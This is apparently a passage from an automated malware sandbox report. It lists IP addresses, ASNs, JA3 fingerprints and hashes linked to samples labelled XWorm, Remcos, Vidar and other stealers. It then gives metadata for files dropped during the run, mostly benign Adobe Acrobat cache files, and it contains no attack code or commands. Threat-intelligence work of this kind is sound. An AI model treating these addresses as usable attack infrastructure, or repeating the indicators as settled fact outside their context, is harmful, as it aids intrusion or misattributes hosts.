                                  myguyapp.comc2.htaGet hashmaliciousXWormBrowse
                                  • 193.26.115.21
                                  EeSNugjFh5.batGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  c2.htaGet hashmaliciousXWormBrowse
                                  • 193.26.115.21

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  QUICKPACKETUSc2.htaGet hashmaliciousXWormBrowse
                                  • 193.26.115.21
                                  EeSNugjFh5.batGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  https://webradiojaguar.net/FNB-POP.pdfGet hashmaliciousUnknownBrowse
                                  • 172.82.129.154
                                  c2.htaGet hashmaliciousXWormBrowse
                                  • 193.26.115.21
                                  Play_VM-NowCRQW.htmlGet hashmaliciousHTMLPhisherBrowse
                                  • 172.82.129.154
                                  new.ini.ps1Get hashmaliciousUnknownBrowse
                                  • 167.88.162.71
                                  i586.elfGet hashmaliciousUnknownBrowse
                                  • 172.82.144.22
                                  sh4.elfGet hashmaliciousMiraiBrowse
                                  • 208.166.51.211
                                  mips.elfGet hashmaliciousUnknownBrowse
                                  • 103.136.150.114
                                  ppc.elfGet hashmaliciousUnknownBrowse
                                  • 103.136.150.114

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eHydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                  • 193.26.115.21
                                  full.exeGet hashmaliciousQuasarBrowse
                                  • 193.26.115.21
                                  fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                  • 193.26.115.21
                                  hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                  • 193.26.115.21
                                  ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                  • 193.26.115.21
                                  pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                  • 193.26.115.21
                                  37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                  • 193.26.115.21
                                  510005940.docx.docGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  update.jsGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 193.26.115.21
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                  • 193.26.115.21
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 193.26.115.21
                                  yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                  • 193.26.115.21
                                  jN6irWtNiG.lnkGet hashmaliciousUnknownBrowse
                                  • 193.26.115.21

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\220239\Carter.pifc2.htaGet hashmaliciousXWormBrowse
                                    c2.htaGet hashmaliciousXWormBrowse
                                      FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                        InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                          vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                            fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                              fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                  qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                    eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                      C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrc2.htaGet hashmaliciousXWormBrowse
                                                        c2.htaGet hashmaliciousXWormBrowse
                                                          FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                            InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                              vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                                fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                  fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                      qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                        eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.184430484266841
                                                                          Encrypted:false
                                                                          SSDEEP:6:75WwOq2PCHhJ2nKuAl9OmbnIFUt8O5Ww/Zmw+O5WwtkwOCHhJ2nKuAl9OmbjLJ:7I7vBHAahFUt8OI6/+OIG56HAaSJ
                                                                          MD5:A4F974261C96F1B67EAC94907141E236
                                                                          SHA1:2499ECFBD5288A0C7754DBB0FB145A261F8AA739
                                                                          SHA-256:5198F21B163F32D2DC19C9B671814180BC3515DF937403393C4D42E42FCDF79F
                                                                          SHA-512:FE22A23849CECDF243ACAF0B9FA055F1E65EB258366CB413AC92B78A6A0A0613CFEB66174E8A943F7B9B08B833E294CB9D1FDF99C4F9FB832DE0958DE7608B56
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.729 ad4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/12-13:07:14.732 ad4 Recovering log #3.2024/12/12-13:07:14.732 ad4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.184430484266841
                                                                          Encrypted:false
                                                                          SSDEEP:6:75WwOq2PCHhJ2nKuAl9OmbnIFUt8O5Ww/Zmw+O5WwtkwOCHhJ2nKuAl9OmbjLJ:7I7vBHAahFUt8OI6/+OIG56HAaSJ
                                                                          MD5:A4F974261C96F1B67EAC94907141E236
                                                                          SHA1:2499ECFBD5288A0C7754DBB0FB145A261F8AA739
                                                                          SHA-256:5198F21B163F32D2DC19C9B671814180BC3515DF937403393C4D42E42FCDF79F
                                                                          SHA-512:FE22A23849CECDF243ACAF0B9FA055F1E65EB258366CB413AC92B78A6A0A0613CFEB66174E8A943F7B9B08B833E294CB9D1FDF99C4F9FB832DE0958DE7608B56
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.729 ad4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/12-13:07:14.732 ad4 Recovering log #3.2024/12/12-13:07:14.732 ad4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):338
                                                                          Entropy (8bit):5.152390589505568
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww2mAVq2PCHhJ2nKuAl9Ombzo2jMGIFUt8O5WwoZAgZmw+O5WwoZAIkwOCHhJV:7IzvBHAa8uFUt8OIbz/+OIbp56HAa8RJ
                                                                          MD5:411177BD747D28AA62D4B18F6DFCCFE9
                                                                          SHA1:F36A32407296DE851A493B241CAD395F0405D003
                                                                          SHA-256:5B952A9542F8DB96F8A837F511F88729BB5264CF7A6C183F3189A0172DA35603
                                                                          SHA-512:BCCC0EFA69F7E444DC29965471A07C5FF1AD15E8FCD11B09C054BE6749886A0C6DA51C3F6630693CF2E4150E9A3BB118FE47A583AC7F747F85CCCEDAACEA0C29
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.817 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/12-13:07:14.818 1440 Recovering log #3.2024/12/12-13:07:14.818 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):338
                                                                          Entropy (8bit):5.152390589505568
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww2mAVq2PCHhJ2nKuAl9Ombzo2jMGIFUt8O5WwoZAgZmw+O5WwoZAIkwOCHhJV:7IzvBHAa8uFUt8OIbz/+OIbp56HAa8RJ
                                                                          MD5:411177BD747D28AA62D4B18F6DFCCFE9
                                                                          SHA1:F36A32407296DE851A493B241CAD395F0405D003
                                                                          SHA-256:5B952A9542F8DB96F8A837F511F88729BB5264CF7A6C183F3189A0172DA35603
                                                                          SHA-512:BCCC0EFA69F7E444DC29965471A07C5FF1AD15E8FCD11B09C054BE6749886A0C6DA51C3F6630693CF2E4150E9A3BB118FE47A583AC7F747F85CCCEDAACEA0C29
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.817 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/12-13:07:14.818 1440 Recovering log #3.2024/12/12-13:07:14.818 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\068d8ba3-0105-47b8-b3d3-80e5d5fa4711.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:modified
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.9581609957270265
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqAfsBdOg2HfAcaq3QYiub6P7E4TX:Y2sRds9gdMHfr3QYhbS7n7
                                                                          MD5:274E2ABFB248198F79DEB4D4213264A3
                                                                          SHA1:6F88DD9B707E9EDF48273BA9BA486D0D6F18827D
                                                                          SHA-256:E799C8D22842387ECC22AD5BC990CA655CAF17FD3E55FDF630DD9079474075F3
                                                                          SHA-512:FAF3122DAE67BB9618F47ADABFAB93CF9AB5C0C22512C63A7ACD3C665B9116E655CD62A0504A6C52E15DCBD8E502E9AF2172C56F9524BF853569E4E0D520096D
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378586843213965","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":916321},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\08635454-eaac-4985-9a12-fbf0a2f61c59.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF44e5b2.TMP (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):475
                                                                          Entropy (8bit):4.963247713778661
                                                                          Encrypted:false
                                                                          SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                          MD5:D46529E824E6E834D0D750C5560C136C
                                                                          SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                          SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                          SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):3878
                                                                          Entropy (8bit):5.232243335145852
                                                                          Encrypted:false
                                                                          SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bw/j5ap:S43C4mS7fFi0KFYDjr3LWO3V3aw+bw/6
                                                                          MD5:9DC7FD6E6D5E6B0A16230922E55D20EE
                                                                          SHA1:351342A16812AB312E54A7CD2E4069C91452E81E
                                                                          SHA-256:CB99023B3D0DA1D1144FC3A30A3A133F3C86AAD738957B60672E6986320D72C2
                                                                          SHA-512:CEC3FE92F719617AAB2ECC0B21C01F748F70A97C16017DEFF933BE0EE20E4DFFD47AABAA98A5596102A7C4021FF542B18891BF9A148612D3A2F7F2C348CB06C1
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):5.180616724102491
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww1AVq2PCHhJ2nKuAl9OmbzNMxIFUt8O5WwL4AgZmw+O5WwJvAIkwOCHhJ2nKA:7INvBHAa8jFUt8OIZ/+OII56HAa84J
                                                                          MD5:BFDC9F343918A4B37A0FD0F07666403F
                                                                          SHA1:34170AE0AD212E5C6D632B396703757FE6028278
                                                                          SHA-256:2401046E2FF55220FAE5BFBEEE6DCB1FD3B45AD5AFAFC93C1C99E2224049F75E
                                                                          SHA-512:7E82DA3A5702A5798F0733B07D22DA77128C86108C9F45905B6EF4E9EC4628E5EF64081192B21C8B75A8428446FACF282FB7AD050456A32BB312CD62CFE465EA
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.969 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/12-13:07:14.971 1440 Recovering log #3.2024/12/12-13:07:14.972 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):5.180616724102491
                                                                          Encrypted:false
                                                                          SSDEEP:6:75Ww1AVq2PCHhJ2nKuAl9OmbzNMxIFUt8O5WwL4AgZmw+O5WwJvAIkwOCHhJ2nKA:7INvBHAa8jFUt8OIZ/+OII56HAa84J
                                                                          MD5:BFDC9F343918A4B37A0FD0F07666403F
                                                                          SHA1:34170AE0AD212E5C6D632B396703757FE6028278
                                                                          SHA-256:2401046E2FF55220FAE5BFBEEE6DCB1FD3B45AD5AFAFC93C1C99E2224049F75E
                                                                          SHA-512:7E82DA3A5702A5798F0733B07D22DA77128C86108C9F45905B6EF4E9EC4628E5EF64081192B21C8B75A8428446FACF282FB7AD050456A32BB312CD62CFE465EA
                                                                          Malicious:false
                                                                          Preview:2024/12/12-13:07:14.969 1440 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/12-13:07:14.971 1440 Recovering log #3.2024/12/12-13:07:14.972 1440 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Certificate, Version=3
                                                                          Category:dropped
                                                                          Size (bytes):1391
                                                                          Entropy (8bit):7.705940075877404
                                                                          Encrypted:false
                                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                          Malicious:false
                                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                          Category:dropped
                                                                          Size (bytes):71954
                                                                          Entropy (8bit):7.996617769952133
                                                                          Encrypted:true
                                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                          Malicious:false
                                                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):192
                                                                          Entropy (8bit):2.7529698674325394
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkllb6RltfllXlE/HT8k/1NNX8RolJuRdxLlGB9lQRYwpDdt:kKVleT84NMa8RdWBwRd
                                                                          MD5:35AD8371543C4767B8B632DAA7F8EC17
                                                                          SHA1:E423DD50E454013AB78A55E59745E7E4502AFFA8
                                                                          SHA-256:81012B96E16D17414F5F2ECA6C46BC4D8A8C9BBB1CAB31E23650FDF6E5505F20
                                                                          SHA-512:B7CB025C99A165037F71AB106B98C79C20F9F92B0811159D80B9D7033EFBC47B83850189EBBF26EAA12203E13CF2C3A75F4E98EA3ECA2EC72DB32A0FED4286D2
                                                                          Malicious:false
                                                                          Preview:p...... ........V>2..L..(....................................................... ..........W....4R..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):328
                                                                          Entropy (8bit):3.137556996908955
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKXLllL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ODnLNkPlE99SNxAhUe/3
                                                                          MD5:360CC3F86FCA430E8DE6D1466045C094
                                                                          SHA1:F516771EFD74A9D57326E7776BE54427A612E25A
                                                                          SHA-256:502A41450F8EFA10F207774228D92A85ED1DA80F5E8418C0588B143B87C6715D
                                                                          SHA-512:F9FD22508DC3EF1A5219B77EB83D8DD203D3FA9D7920C5757DCE3495AD4095E0172E86869C24CEC88BF771BA9A0897697CA82DD955E6A3F6C411C9E26E2CF40F
                                                                          Malicious:false
                                                                          Preview:p...... ..........o..L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
